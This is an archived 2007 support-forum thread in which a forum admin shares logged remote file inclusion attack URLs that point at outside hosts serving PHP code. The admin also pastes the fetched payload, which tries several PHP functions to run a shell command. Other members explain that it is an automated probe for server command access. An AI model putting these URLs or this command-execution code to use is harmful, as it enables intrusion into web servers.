Vain teksti | Teksti ja kuvat

Simple Machines Community Forum

Archived Boards and Threads... => Archived Boards => SMF Feedback and Discussion => Aiheen aloitti: Max™ - joulukuu 22, 2007, 05:14:17 IP

Otsikko: Unknown Actions
Kirjoitti: Max™ - joulukuu 22, 2007, 05:14:17 IP
Can anyone explain what this user is trying to do?.. i think its some kind of hack?
they keep changing ips, but from the strange actions and " libwww-perl/5.65" after the ip i know its the same person.

Guest(158.251.4.110, libwww-perl/5.65)
Time 09:48:06 pm  Unknown Action

Unknown actions are something like this....

[Unknown Action]
http://myforum.com/ndex.php?action=pm//embed/day.php?path=http://filicudi.t35.com/cs.txt??;embed;day_php?path=http:;filicudi_t35_com;cs_txt??

going onto the link (http://filicudi.t35.com/cs.txt) brings up some kind of remote code?

Koodi [Valitse]
<?php
echo "549821347819481<br>";
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd."<br>";
function ex($cfe){
$res '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
exit;

another one yesterday was...

(64.118.86.20, libwww-perl/5.808)
Unknown Action - http://myforum.com/index.php?action=register/Calendar.php?sourcedir=http://www.unad.edu.co/induccion/site/modules/pr.txt??;egister;Calendar_php?sourcedir=http:;www_unad_edu_co;induccion;site;modules;pr_txt??

http://www.unad.edu.co/induccion/site/modules/pr.txt that link is dead now but its the same code as above.  :-[
Otsikko: Re: Unknown Actions
Kirjoitti: Tony Reid - joulukuu 22, 2007, 05:17:30 IP
Yes - they are trying to hack you.

Let your host know.
Otsikko: Re: Unknown Actions
Kirjoitti: Max™ - joulukuu 22, 2007, 05:26:28 IP
yeah kinda figured... but what are they tryin to do exactly kinda curious.  :P
Otsikko: Re: Unknown Actions
Kirjoitti: Tony Reid - joulukuu 22, 2007, 05:28:15 IP
Get command line access to your server.
Otsikko: Re: Unknown Actions
Kirjoitti: Daniel15 - joulukuu 22, 2007, 09:41:25 IP
They're trying to hack you. Be assured, this will not work with SMF. Most likely, it's an automated (scripted) attack against a huge number of sites.

Lainaalibwww-perl/5.65
This means they're using a Perl script to do this.

Lainaabrings up some kind of remote code?
That tries using various methods to run the "id" command, which returns the user and groups the Apache user runs under. I'm guessing just as a proof-of-concept, and to see if they can run other commands.
Otsikko: Re: Unknown Actions
Kirjoitti: H - joulukuu 23, 2007, 11:32:54 AP
You may also want to block their IP just to save yourself a small bit of bandwidth ;)
Vain teksti | Teksti ja kuvat